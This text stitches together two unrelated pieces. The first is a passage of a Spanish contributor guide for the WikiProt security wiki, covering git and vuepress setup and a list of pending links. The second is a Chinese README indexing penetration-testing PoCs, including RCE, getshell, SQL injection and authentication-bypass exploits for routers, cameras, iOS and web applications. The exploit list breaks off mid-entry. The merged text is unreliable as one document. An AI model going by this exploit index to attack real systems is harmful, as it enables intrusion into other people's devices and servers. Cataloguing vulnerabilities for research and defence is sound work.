se hace un "Pull Request". 7. Revisaremos el código y lo antes posible estará subido al servidor. 8. Ya estaría todo hecho por tu parte. ### Para avezados Recuerda que también has de tener cuenta en Github (es gratis) para poder subir código. Aquí tienes el enlace para [crear cuenta en Github](https://github.com/join?ref_cta=Sign+up&ref_loc=header+logged+out&ref_page=%2F&source=header-home) Si ya estás más experimentado con Git, puedes seguir está guía: [Guía para aportar](https://github.com/ProtAAPP/wikiprot/blob/master/code_contribution_guideline.md) Ahora ya estás en condiciones de poder modificarlo en tu entorno local, por lo que continua con el siguiente apartado. ### Instalación para preparar el entorno local Una vez cumplidos los requisitos definidos anteriormente, y una vez hecho el fork lo primero es descargarse la última versión del repositorio, antes de modificar ningún contenido. Si fuera la primera vez que me descargo el repositorio: ```bash cd /proyectos git clone https://github.com/ProtAAPP/wikiprot.git cd wiki-prot yarn install # Instalar librerías, principalmente vuepress ``` Si por el contrario ya lo tuviera descargado, sólo hay que actualizarlo con los últimos cambios: ```bash cd /proyectos/wikiprot git pull # Traer los últimos cambios yarn install # Instalar/actualizar librerías. Ejecutar siempre ``` *(Si no tienes conocimientos suficientes de git o no puedes instalarlo, es posible utilizar Github para navegar a través de las carpetas del repositorio [para editar, previsualizar y enviar contenidos.](https://docs.github.com/es/free-pro-team@latest/github/managing-files-in-a-repository/editing-files-in-your-repository))* Y por último, deberás instalar Vuepress usando yarn: ```bash yarn add -D vuepress ``` ### Modificar contenidos del repositorio Ahora toca **modificar los ficheros markdown** para introducir o modificar los contenidos de la guía. Gracias por aportar tus conocimientos a la causa. Se puede utilizar cualquier editor de texto (notepad, [notepad++](https://notepad-plus-plus.org/downloads/), [Atom](https://atom.io/), [VSCode](https://code.visualstudio.com/), etc). Aunque no es estrictamente necesario, sí es muy recomendable lanzar el servidor de desarrollo de _Vuepress_, de forma que según modificas cualquier contenido, en el momento veas cómo va quedando. Para ello: ```bash cd /proyectos/wikiprot yarn dev ``` Ahora abre un navegador (firefox, chrome, edge...) y entra en [http://localhost:8080](http://localhost:8080), donde podrás ver este repositorio. Cada vez que cambies una palabra de la documentación y guardes el fichero, el cambio se reflejará automáticamente en el navegador. :::warning Cuidado: El menú lateral no se actualiza automáticamente Si introduces nuevas secciones en los ficheros markdown, para que el menú lateral "se entere" habrás de parar el servidor y volver a ejecutar ```yarn dev``` ::: Si tienes dos monitores, lo suyo es tener en un monitor el programa en el que estés editando los ficheros, y en el otro monitor tener abierto el navegador para ver cómo van quedando los cambios en el momento. Por último, una vez finalizados los cambios, simplemente añade todo lo modificado a las "propuestas a incorporar", realiza un commit (paquete de modificaciones), y súbelo a github: ```bash # Situado en la raíz del proyecto (por ejemplo /proyectos/wikiprot): git add . # Proponer todos ficheros modificados para próximo commit git commit -m "Aportación X" # Hacer commit git push # Subir a Github ``` Muchísimas gracias por aportar tu conocimiento y tiempo a este proyecto. <!-- ## La ética en la ciberseguridad El mundo digital en el que nos encontramos, y que está sufriendo una fuerte aceleración, tiene como casi todas las cosas una doble cara, la de aquellos que pueden aprovechar tal potencia para hacer el mal. La implantación de la sociedad digital en todos los ámbitos de la sociedad ha de pagar un **importante peaje: el de la seguridad**. De acuerdo con el antiguo responsable de ciberseguridad y protección de la información del gobierno de Australia, Stephen Day, **la ética y la honradez deben regir las prácticas de la industria de la seguridad cibernética**. La rapidez y la disponibilidad de los recursos generados por el desarrollo de internet y los entornos digitales han favorecido el crecimiento exponencial de numerosas compañías y negocios, pero los riesgos a los que estas se exponen también se han multiplicado. Podría ocurrir que un profesional de la ciberseguridad rompa viole ciertas reglas e invada la privacidad de otros para lograr sus cometidos. --> <!-- ## Formación en ciberseguridad Cursos: Libros: Entornos para practicar: - [Vulnhub](https://www.vulnhub.com/) - Colección de máquinas virtuales vulnerables para jugar con ellas para hackearlas. --> ### Organizando los contenidos A la hora de **organizar los contenidos de este repositorio**, existe una primera jerarquía de apartados principales que se muestran en el menú lateral, y que está definida por el equipo que ha puesto en marcha la iniciativa. Este primer nivel no se puede modificar sin debatirlo, y está configurado de forma fija para el repositorio. Dentro de cada sección principal, se podrán ir incluyendo secciones de segundo y tercer nivel, simplemente incluyendo títulos en markdown en los archivos _.md_. El menú del repositorio se construye dinámicamente para adaptarse al contenido de los ficheros _.md_, razón por la cual existe mucha más libertad para este tipo de subapartados. **Cada sección** en principio debe seguir una estructura aproximada a la siguiente: 1. **Descripción concisa, clara y breve del concepto**. Aunque pueda parecerte algo evidente, no todo el mundo conoce o está familiarizado con todos los conceptos de seguridad. Por esta razón, es recomendable iniciar cada sección con una breve descripción. 2. En su caso, y de forma opcional, un mayor desarrollo explicativo. 3. **Referencias importantes** que permitan profundizar sobre el tema, con un objetivo didáctico. Pueden ser referencias a la wikipedia, a artículos de calidad u otros enlaces que permitan obtener un conocimiento más profundo. 4. **Herramientas** y productos útiles relacionados con la sección. Debe indicarse de forma clara **si son gratuitos**, de software libre, o tienen algún coste o limitación. Estas herramientas deben ser referenciadas con un enlace a su página oficial. 5. Desarrollos en mayor profundidad. Si se desea incluir en WikiProt un mayor desarrollo de algún concepto o herramienta, lo adecuado es hacerlo en otro fichero markdown que se referencie desde este punto. Por ejemplo, podrían incluirse ejemplos de configuraciones de un servidor web, o trozos de código fuente explicando cómo se lleva a la práctica un concepto en varios lenguajes de programación, o el detalle de cómo fue un evento de ProtAAPP con sus fotos y presentaciones. 6. Es muy valioso incluir "tips", "warnings" o mensajes de advertencia "danger" para alertar sobre trucos, consejos, avisos o peligros a conocer. Por ejemplo, este "tip": ::: tip Vas por buen camino Esta sección es de obligada lectura antes de aportar tu granito de arena. Por cierto, ¡muchas gracias! ::: **EL buscador** del repositorio sólo busca en los títulos de las secciones. no busca en el contenido de los ficheros markdown. Esto puede sorprender al principio, pero es una buena idea. ::: tip Dedica tiempo a pensar bien el título de cada sección Para que las cosas se encuentren bien con el buscador hay que **incluir las palabras clave en el título de las secciones**. ::: ### Asuntos por desarrollar Podéis contribuir al repositorio con cualquier contenido que consideréis interesante. No obstante, aquí enumeramos algunos contenidos que tenemos pendientes desarrollar o profundizar: - [Estrategias, planes y experiencias en implantación ENS](http://wikiprot.protaapp.com/03_gestion/#esquema-nacional-de-seguridad-para-organizaciones-publicas-en-espana) - Comparativa entre controles de los diferentes frameworks. - [Seguridad en Bases de Datos](http://wikiprot.protaapp.com/04_tecnologias/#bases-de-datos) - ... ### Enlaces pendientes de ser incluidos en el repositorio Los siguientes enlaces están pendientes de ser incluidos en el repositorio en el lugar que les corresponda: * [https://blog.zsec.uk/locking-down-ssh-the-right-way/](https://blog.zsec.uk/locking-down-ssh-the-right-way/) * [https://zdresearch.com/finding-the-origin-ip-behind-cdns/](https://zdresearch.com/finding-the-origin-ip-behind-cdns/) * [https://cybersecurity.att.com/blogs/security-essentials/building-a-home-lab-to-become-a-malware-hunter-a-beginners-guide](https://cybersecurity.att.com/blogs/security-essentials/building-a-home-lab-to-become-a-malware-hunter-a-beginners-guide) * [https://github.com/ihebski/DefaultCreds-cheat-sheet](https://github.com/ihebski/DefaultCreds-cheat-sheet) * [https://www.ra-ma.es/libro/privacidad-y-ocultacion-de-informacion-digital-esteganografia_47926/](https://www.ra-ma.es/libro/privacidad-y-ocultacion-de-informacion-digital-esteganografia_47926/) * [https://tldrsec.com/blog/lesser-known-aws-attacks/](https://tldrsec.com/blog/lesser-known-aws-attacks/) * [https://zeltser.com/start-learning-malware-analysis/](https://zeltser.com/start-learning-malware-analysis/) * [https://tryhackme.com/room/yara](https://tryhackme.com/room/yara) * [https://twitter.com/superruserr/status/1347938706875887616?s=19](https://twitter.com/superruserr/status/1347938706875887616?s=19) * [https://thehackernews.com/2021/01/nsa-suggests-enterprises-use-designated.html?m=1#click=https://t.co/l9SnXVoq7U](https://thehackernews.com/2021/01/nsa-suggests-enterprises-use-designated.html?m=1#click=https://t.co/l9SnXVoq7U) * [https://0xn3va.gitbook.io/cheat-sheets/web-application/oauth](https://0xn3va.gitbook.io/cheat-sheets/web-application/oauth) * [http://www.bugbountyhunter.net/twitter.php](http://www.bugbountyhunter.net/twitter.php) * [https://msendpointmgr.com/2018/06/23/implementing-modern-security-tools-part-1/](https://msendpointmgr.com/2018/06/23/implementing-modern-security-tools-part-1/) * [https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html) * [https://twitter.com/CCNCERT/status/1375090809314410501?s=19](https://twitter.com/CCNCERT/status/1375090809314410501?s=19) * [https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/](https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/) * [https://danielmiessler.com/blog/casmm-consumer-authentication-security-maturity-model-2/](https://danielmiessler.com/blog/casmm-consumer-authentication-security-maturity-model-2/) * [https://channel9.msdn.com/Events/Ignite/New-Zealand-2016/M377](https://channel9.msdn.com/Events/Ignite/New-Zealand-2016/M377) * [https://twitter.com/blueteamblog/status/1375724947331543042?s=19](https://twitter.com/blueteamblog/status/1375724947331543042?s=19) * [https://thedarksource.com/shodan-cheat-sheet/](https://thedarksource.com/shodan-cheat-sheet/) * [https://github.com/1ndianl33t/Bug-Bounty-Roadmaps](https://github.com/1ndianl33t/Bug-Bounty-Roadmaps) * [https://class.malware.re/](https://class.malware.re/) * Cybersecurity Domain Map ver 3.0 [https://www.linkedin.com/pulse/cybersecurity-domain-map-ver-30-henry-jiang](https://www.linkedin.com/pulse/cybersecurity-domain-map-ver-30-henry-jiang) * [https://github.com/larryboettger/Cybersecurity-Mindmaps](https://github.com/larryboettger/Cybersecurity-Mindmaps) * [https://tdm.socprime.com/education/webinars](https://tdm.socprime.com/education/webinars) * [https://docs.google.com/spreadsheets/u/1/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/pubhtml#](https://docs.google.com/spreadsheets/u/1/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/pubhtml#) * [https://www.blueteamsacademy.com/](https://www.blueteamsacademy.com/)
## <span id="head1"> Penetration_Testing_POC</span> 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 - [ Penetration_Testing_POC](#head1) - [ 请善用搜索[`Ctrl+F`]查找](#head2) - [IOT Device&Mobile Phone](#head3) - [Web APP](#head4) - [ 提权辅助相关](#head5) - [ PC](#head6) - [ tools-小工具集合](#head7) - [ 文章/书籍/教程相关](#head8) - [ 说明](#head9) ## <span id="head2"> 请善用搜索[`Ctrl+F`]查找</span> ## <span id="head3">IOT Device&Mobile Phone</span> - [天翼创维awifi路由器存在多处未授权访问漏洞](天翼创维awifi路由器存在多处未授权访问漏洞.md) - [华为WS331a产品管理页面存在CSRF漏洞](华为WS331a产品管理页面存在CSRF漏洞.md) - [CVE-2019-16313 蜂网互联企业级路由器v4.31密码泄露漏洞](./CVE-2019-16313%20蜂网互联企业级路由器v4.31密码泄露漏洞.md) - [D-Link路由器RCE漏洞](./CVE-2019-16920-D-Link-rce.md) - [CVE-2019-13051-Pi-Hole路由端去广告软件的命令注入&权限提升](./CVE-2019-13051) - [D-Link DIR-859 - RCE UnAutenticated (CVE-2019–17621)](https://github.com/s1kr10s/D-Link-DIR-859-RCE) - [Huawei HG255 Directory Traversal[目录穿越]](https://packetstormsecurity.com/files/155954/huaweihg255-traversal.rb.txt)|[本地备份文件](./tools/huaweihg255-traversal.rb) - [D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)CVE-2019-20215(Metasploit)](./POC_Details/D-Link%20Devices%20-%20Unauthenticated%20Remote%20Command%20Execution%20in%20ssdpcgi%20(Metasploit)%20CVE-2019-20215.rb) - [从 Interfaces.d 到 RCE:Mozilla WebThings IoT 网关漏洞挖掘](https://research.nccgroup.com/2020/02/10/interfaces-d-to-rce/) - [小米系列路由器远程命令执行漏洞(CVE-2019-18370,CVE-2019-18371)](https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/report/report.md) - [Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload-未经验证即可替换固件)](https://www.exploit-db.com/exploits/48158) - [cve-2020-8634&cve-2020-8635](https://www.exploit-db.com/exploits/48160)|[Wing FTP Server 6.2.3权限提升漏洞发现分析复现过程](https://www.hooperlabs.xyz/disclosures/cve-2020-8635.php)|[Wing FTP Server 6.2.5权限提升](https://www.exploit-db.com/exploits/48154) - [CVE-2020-9374-TP LINK TL-WR849N - RCE](./CVE-2020-9374.md) - [CVE-2020-12753-LG 智能手机任意代码执行漏洞](https://github.com/shinyquagsire23/CVE-2020-12753-PoC) - [CVE-2020-12695-UPnP 安全漏洞](https://github.com/yunuscadirci/CallStranger) - [79款 Netgear 路由器遭远程接管0day](https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.06.15-netgear/exploit.py) - [dlink-dir610-exploits-Exploits for CVE-2020-9376 and CVE-2020-9377](https://github.com/renatoalencar/dlink-dir610-exploits) - [wacker:一组脚本,可辅助对WPA3接入点执行在线词典攻击](https://github.com/blunderbuss-wctf/wacker) - [CVE-2020-24581 D-Link DSL-2888A 远程命令执行漏洞分析](./books/CVE-2020-24581%20D-Link%20DSL-2888A%20远程命令执行漏洞分析.pdf)-[原地址](https://www.anquanke.com/post/id/229323) - [CNVD-2021-14536_锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞](./CNVD-2021-14536_锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞.md) - [CNVD-2021-14544:Hikvision 海康威视流媒体管理服务器任意文件读取](https://github.com/Henry4E36/Hikvision) - [CNVD-2020-25078:D-link 敏感信息泄漏,可以直接获取账户密码查看监控](https://github.com/Henry4E36/D-link-information) - [ios-gamed-0day](https://github.com/illusionofchaos/ios-gamed-0day) - [ios-nehelper-wifi-info-0day](https://github.com/illusionofchaos/ios-nehelper-wifi-info-0day) - [ios-nehelper-enum-apps-0day](https://github.com/illusionofchaos/ios-nehelper-enum-apps-0day) - [iOS 15.0.1 RCE PoC](https://github.com/jonathandata1/ios_15_rce) - [CVE-2021-36260:海康威视产品命令注入漏洞](https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html) - [CVE-2021-33044、CVE-2021-33045 大华摄像头POC](https://github.com/mcw0/DahuaConsole)|[相关分析](https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt)|[登录绕过chrome 插件](https://github.com/bp2008/DahuaLoginBypass) - [CVE-2021-36260:海康威视命令注入漏洞](https://github.com/rabbitsafe/CVE-2021-36260) - [CVE-2021-41653:TP-Link TL-WR840N V5(EU) - RCE ](./books/TP-Link%20TL-WR840N%20V5(EU)%20-%20RCE%20-%20CVE-2021-41653.pdf) ## <span id="head4">Web APP</span> - [致远OA_A8_getshell_0day](致远OA_A8_getshell_0day.md) - [Couch through 2.0存在路径泄露漏洞 ](Couch%20through%202.0存在路径泄露漏洞.md) - [Cobub Razor 0.7.2存在跨站请求伪造漏洞](Cobub%20Razor%200.7.2存在跨站请求伪造漏洞.md) - [joyplus-cms 1.6.0存在CSRF漏洞可增加管理员账户](joyplus-cms%201.6.0存在CSRF漏洞可增加管理员账户.md) - [MiniCMS 1.10存在CSRF漏洞可增加管理员账户](MiniCMS%201.10存在CSRF漏洞可增加管理员账户.md) - [Z-Blog 1.5.1.1740存在XSS漏洞](Z-Blog%201.5.1.1740存在XSS漏洞.md) - [YzmCMS 3.6存在XSS漏洞](YzmCMS%203.6存在XSS漏洞.md) - [Cobub Razor 0.7.2越权增加管理员账户](Cobub%20Razor%200.7.2越权增加管理员账户.md) - [Cobub Razor 0.8.0存在SQL注入漏洞](Cobub%20Razor%200.8.0存在SQL注入漏洞.md) - [Cobub Razor 0.8.0存在物理路径泄露漏洞](Cobub%20Razor%200.8.0存在物理路径泄露漏洞.md) - [五指CMS 4.1.0存在CSRF漏洞可增加管理员账户](五指CMS%204.1.0存在CSRF漏洞可增加管理员账户.md) - [DomainMod的XSS集合](DomainMod的XSS集合.md) - [GreenCMS v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户](GreenCMS%20v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户.md) - [yii2-statemachine v2.x.x存在XSS漏洞](yii2-statemachine%20v2.x.x存在XSS漏洞.md) - [maccms_v10存在CSRF漏洞可增加任意账号](maccms_v10存在CSRF漏洞可增加任意账号.md) - [LFCMS 3.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户](LFCMS%203.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户.md) - [Finecms_v5.4存在CSRF漏洞可修改管理员账户密码](Finecms_v5.4存在CSRF漏洞可修改管理员账户密码.md) - [Amazon Kindle Fire HD (3rd Generation)内核驱动拒绝服务漏洞](Amazon%20Kindle%20Fire%20HD%20\(3rd%20Generation\)内核驱动拒绝服务漏洞.md) - [Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞](Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞.md) - [Hucart cms v5.7.4 CSRF漏洞可任意增加管理员账号](Hucart%20cms%20v5.7.4%20CSRF漏洞可任意增加管理员账号.md) - [indexhibit cms v2.1.5 直接编辑php文件getshell](indexhibit%20cms%20v2.1.5%20直接编辑php文件getshell.md) - [S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号](S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号.md) - [S-CMS PHP v3.0存在SQL注入漏洞](S-CMS%20PHP%20v3.0存在SQL注入漏洞.md) - [MetInfoCMS 5.X版本GETSHELL漏洞合集](MetInfoCMS%205.X版本GETSHELL漏洞合集.md) - [discuz ml RCE 漏洞检测工具](discuz-ml-rce/README.md) - [thinkphp5框架缺陷导致远程代码执行](thinkphp5框架缺陷导致远程代码执行.md) - [FineCMS_v5.0.8两处getshell](FineCMS_v5.0.8两处getshell.md) - [Struts2_045漏洞批量检测|搜索引擎采集扫描](Struts2_045-Poc) - [thinkphp5命令执行](thinkphp5命令执行.md) - [typecho反序列化漏洞](typecho反序列化漏洞.md) - [CVE-2019-10173 Xstream 1.4.10版本远程代码执行](CVE-2019-10173%20Xstream%201.4.10版本远程代码执行漏洞.md) - [IIS/CVE-2017-7269-Echo-PoC](./IIS/CVE-2017-7269-Echo-PoC) - [CVE-2019-15107 Webmin RCE](./CVE-2019-15107) - [thinkphp5 rce漏洞检测工具](./tp5-getshell) - [thinkphp5_RCE合集](./tp5-getshell/TP5_RCE合集.md) - [thinkphp3.X-thinkphp5.x](./tp5-getshell/ThinkPHP.md) - [关于ThinkPHP框架的历史漏洞分析集合](https://github.com/Mochazz/ThinkPHP-Vuln) - [CVE-2019-11510](./CVE-2019-11510) - [Redis(<=5.0.5) RCE](./redis-rogue-server) - [Redis 4.x/5.x RCE(主从复制导致RCE)](https://github.com/Ridter/redis-rce) - [生成Redis恶意模块so文件配合主从复制RCE达到命令执行](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand)|[相关文章](https://www.freebuf.com/vuls/224235.html) - [RedisWriteFile-通过 `Redis` 主从写出无损文件,可用于 `Windows` 平台下写出无损的 `EXE`、`DLL`、 `LNK` 和 `Linux` 下的 `OS` 等二进制文件](https://github.com/r35tart/RedisWriteFile) - [WeblogicScanLot系列,Weblogic漏洞批量检测工具](./WeblogicScanLot) - [jboss_CVE-2017-12149](./jboss_CVE-2017-12149) - [Wordpress的拒绝服务(DoS)-CVE-2018-6389](./CVE-2018-6389) - [Webmin Remote Code Execution (authenticated)-CVE-2019-15642](https://github.com/jas502n/CVE-2019-15642) - [CVE-2019-16131 OKLite v1.2.25 任意文件上传漏洞](./CVE-2019-16131%20OKLite%20v1.2.25%20任意文件上传漏洞.md) - [CVE-2019-16132 OKLite v1.2.25 存在任意文件删除漏洞](./CVE-2019-16132%20OKLite%20v1.2.25%20存在任意文件删除漏洞.md) - [CVE-2019-16309 FlameCMS 3.3.5 后台登录处存在sql注入漏洞](./CVE-2019-16309%20FlameCMS%203.3.5%20后台登录处存在sql注入漏洞.md) - [CVE-2019-16314 indexhibit cms v2.1.5 存在重装并导致getshell](./CVE-2019-16314%20indexhibit%20cms%20v2.1.5%20存在重装并导致getshell.md) - [泛微OA管理系统RCE漏洞利用脚本](./泛微OA管理系统RCE漏洞利用脚本.md) - [CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit](./CVE-2019-16759%20vBulletin%205.x%200day%20pre-auth%20RCE%20exploit.md) - [zentao-getshell 禅道8.2 - 9.2.1前台Getshell](./zentao-getshell) - [泛微 e-cology OA 前台SQL注入漏洞](./泛微%20e-cology%20OA%20前台SQL注入漏洞.md) - [Joomla-3.4.6-RCE](./Joomla-3.4.6-RCE.md) - [Easy File Sharing Web Server 7.2 - GET 缓冲区溢出 (SEH)](./Easy%20File%20Sharing%20Web%20Server%207.2%20-%20GET%20缓冲区溢出%20(SEH).md) - [构建ASMX绕过限制WAF达到命令执行(适用于ASP.NET环境)](./构建ASMX绕过限制WAF达到命令执行.md) - [CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass](./CVE-2019-17662-ThinVNC%201.0b1%20-%20Authentication%20Bypass.md) - [CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd](./CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md) - [CVE-2019-11043-PHP远程代码执行漏](./CVE-2019-11043) - [ThinkCMF漏洞全集和](./ThinkCMF漏洞全集和.md) - [CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行](./CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行.md) - [ecologyExp.jar-泛微ecology OA系统数据库配置文件读取](./tools/ecologyExp.jar) - [freeFTP1.0.8-'PASS'远程缓冲区溢出](./freeFTP1.0.8-'PASS'远程缓冲区溢出.md) - [rConfig v3.9.2 RCE漏洞](./rConfig%20v3.9.2%20RCE漏洞.md) - [apache_solr_rce](./solr_rce.md) - [CVE-2019-7580 thinkcmf-5.0.190111后台任意文件写入导致的代码执行](CVE-2019-7580%20thinkcmf-5.0.190111后台任意文件写入导致的代码执行.md) - [Apache Flink任意Jar包上传导致远程代码执行](https://github.com/LandGrey/flink-unauth-rce) - [Jwt_Tool - 用于验证、伪造、扫描和篡改 JWT(JSON Web 令牌)](https://github.com/ticarpi/jwt_tool) - [cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC](cve-2019-17424%20nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC.md) - [CVE-2019-12409_Apache_Solr RCE](https://github.com/jas502n/CVE-2019-12409) - [Shiro RCE (Padding Oracle Attack)](https://github.com/wuppp/shiro_rce_exp) - [CVE-2019-19634-class.upload.php <= 2.0.4任意文件上传](https://github.com/jra89/CVE-2019-19634) - [Apache Solr RCE via Velocity Template Injection](./Apache%20Solr%20RCE%20via%20Velocity%20Template%20Injection.md) - [CVE-2019-10758-mongo-express before 0.54.0 is vulnerable to Remote Code Execution ](https://github.com/masahiro331/CVE-2019-10758/) - [CVE-2019-2107-Android播放视频-RCE-POC(Android 7.0版本,7.1.1版本,7.1.2版本,8.0版本,8.1版本,9.0版本)](https://github.com/marcinguy/CVE-2019-2107) - [CVE-2019-19844-Django重置密码漏洞(受影响版本:Django master branch,Django 3.0,Django 2.2,Django 1.11)](https://github.com/ryu22e/django_cve_2019_19844_poc/) - [CVE-2019-17556-unsafe-deserialization-in-apache-olingo(Apache Olingo反序列化漏洞,影响: 4.0.0版本至4.6.0版本)](https://medium.com/bugbountywriteup/cve-2019-17556-unsafe-deserialization-in-apache-olingo-8ebb41b66817) - [ZZCMS201910 SQL Injections](./ZZCMS201910%20SQL%20Injections.md)|[ZZCMS201910代码审计](./books/ZZCMS201910代码审计.pdf) - [WDJACMS1.5.2模板注入漏洞](./WDJACMS1.5.2模板注入漏洞.md) - [CVE-2019-19781-Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway](https://github.com/projectzeroindia/CVE-2019-19781) - [CVE-2019-19781.nse---use Nmap check Citrix ADC Remote Code Execution](https://github.com/cyberstruggle/DeltaGroup/tree/master/CVE-2019-19781) - [Mysql Client 任意文件读取攻击链拓展](https://paper.seebug.org/1112/) - [CVE-2020-5504-phpMyAdmin注入(需要登录)](https://xz.aliyun.com/t/7092)-[另一篇关于次漏洞的 复现](https://mp.weixin.qq.com/s/epQdTdy6E8QdQTqBbq_Edw) - [CVE-2020-5509-Car Rental Project 1.0版本中存在远程代码执行漏洞](https://github.com/FULLSHADE/CVE-2020-5509-POC) - [CryptoAPI PoC CVE-2020-0601](https://github.com/kudelskisecurity/chainoffools/blob/master/README.md)|[另一个PoC for CVE-2020-0601](https://github.com/ollypwn/CVE-2020-0601) - [New Weblogic RCE (CVE-2020-2546、CVE-2020-2551) CVE-2020-2546](https://mp.weixin.qq.com/s/Q-ZtX-7vt0JnjNbBmyuG0w)|[WebLogic WLS核心组件RCE分析(CVE-2020-2551)](https://www.anquanke.com/post/id/199695)|[CVE-2020-2551-Weblogic IIOP 反序列化EXP](https://github.com/Y4er/CVE-2020-2551) - [CVE-2020-5398 - RFD(Reflected File Download) Attack for Spring MVC](https://github.com/motikan2010/CVE-2020-5398/) - [PHPOK v5.3&v5.4getshell](https://www.anquanke.com/post/id/194453) | [phpok V5.4.137前台getshell分析](https://forum.90sec.com/t/topic/728) | [PHPOK 4.7从注入到getshell](https://xz.aliyun.com/t/1569) - [thinkphp6 session 任意文件创建漏洞复现 含POC](./books/thinkphp6%20session%20任意文件创建漏洞复现%20含POC.pdf) --- 原文在漏洞推送公众号上 - [ThinkPHP 6.x反序列化POP链(一)](./books/ThinkPHP%206.x反序列化POP链(一).pdf)|[原文链接](https://mp.weixin.qq.com/s/rEjt9zb-AksiVwF1GngFww) - [ThinkPHP 6.x反序列化POP链(二)](./books/ThinkPHP%206.x反序列化POP链(二).pdf)|[原文链接](https://mp.weixin.qq.com/s/q8Xa3triuXEB3NoeOgka1g) - [ThinkPHP 6.x反序列化POP链(三)](./books/ThinkPHP%206.x反序列化POP链(三).pdf)|[原文链接](https://mp.weixin.qq.com/s/PFNt3yF0boE5lR2KofghBg) - [WordPress InfiniteWP - Client Authentication Bypass (Metasploit)](https://www.exploit-db.com/exploits/48047) - [【Linux提权/RCE】OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution](https://www.exploit-db.com/exploits/48051) - [CVE-2020-7471-django1.11-1.11.282.2-2.2.103.0-3.0.3 StringAgg(delimiter)使用了不安全的数据会造成SQL注入漏洞环境和POC](https://github.com/Saferman/CVE-2020-7471) - [CVE-2019-17564 : Apache Dubbo反序列化漏洞](https://www.anquanke.com/post/id/198747) - [CVE-2019-2725(CNVD-C-2019-48814、WebLogic wls9-async)](https://github.com/lufeirider/CVE-2019-2725) - [YzmCMS 5.4 后台getshell](https://xz.aliyun.com/t/7231) - 关于Ghostcat(幽灵猫CVE-2020-1938漏洞):[CNVD-2020-10487(CVE-2020-1938), tomcat ajp 文件读取漏洞poc](https://github.com/nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC)|[Java版本POC](https://github.com/0nise/CVE-2020-1938)|[Tomcat-Ajp协议文件读取漏洞](https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/)|[又一个python版本CVE-2020-1938漏洞检测](https://github.com/xindongzhuaizhuai/CVE-2020-1938)|[CVE-2020-1938-漏洞复现环境及EXP](https://github.com/laolisafe/CVE-2020-1938) - [CVE-2020-8840:Jackson-databind远程命令执行漏洞(或影响fastjson)](https://github.com/jas502n/CVE-2020-8840) - [CVE-2020-8813-Cacti v1.2.8 RCE远程代码执行 EXP以及分析(需要认证/或开启访客即可不需要登录)(一款Linux是基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具)](https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/)|[EXP](./CVE-2020-8813%20-%20Cacti%20v1.2.8%20RCE.md)|[CVE-2020-8813MSF利用脚本](https://www.exploit-db.com/exploits/48159) - [CVE-2020-7246-PHP项目管理系统qdPM< 9.1 RCE](https://www.exploit-db.com/exploits/48146) - [CVE-2020-9547:FasterXML/jackson-databind 远程代码执行漏洞](https://github.com/fairyming/CVE-2020-9547) - [CVE-2020-9548:FasterXML/jackson-databind 远程代码执行漏洞](https://github.com/fairyming/CVE-2020-9548) - [Apache ActiveMQ 5.11.1目录遍历/ Shell上传](https://cxsecurity.com/issue/WLB-2020030033) - [CVE-2020-2555:WebLogic RCE漏洞POC](https://mp.weixin.qq.com/s/Wq6Fu-NlK8lzofLds8_zoA)|[CVE-2020-2555-Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE](https://github.com/Y4er/CVE-2020-2555) - [CVE-2020-1947-Apache ShardingSphere UI YAML解析远程代码执行漏洞](https://github.com/jas502n/CVE-2020-1947) - [CVE-2020-0554:phpMyAdmin后台SQL注入](./CVE-2020-0554:phpMyAdmin后台SQL注入.md) - [泛微E-Mobile Ognl 表达式注入](./泛微e-mobile%20ognl注入.md)|[表达式注入.pdf](./books/表达式注入.pdf) - [通达OA RCE漏洞](https://github.com/fuhei/tongda_rce)|[通达OAv11.6版本RCE复现分析+EXP](./books/通达OAv11.6版本漏洞复现分析.pdf)-[EXP下载](./tools/通达OA_v11.6_RCE_EXP.py) - [CVE-2020-10673-jackson-databind JNDI注入导致远程代码执行](https://github.com/0nise/vuldebug) - [CVE-2020-10199、CVE-2020-10204漏洞一键检测工具,图形化界面(Sonatype Nexus <3.21.1)](https://github.com/magicming200/CVE-2020-10199_CVE-2020-10204) - 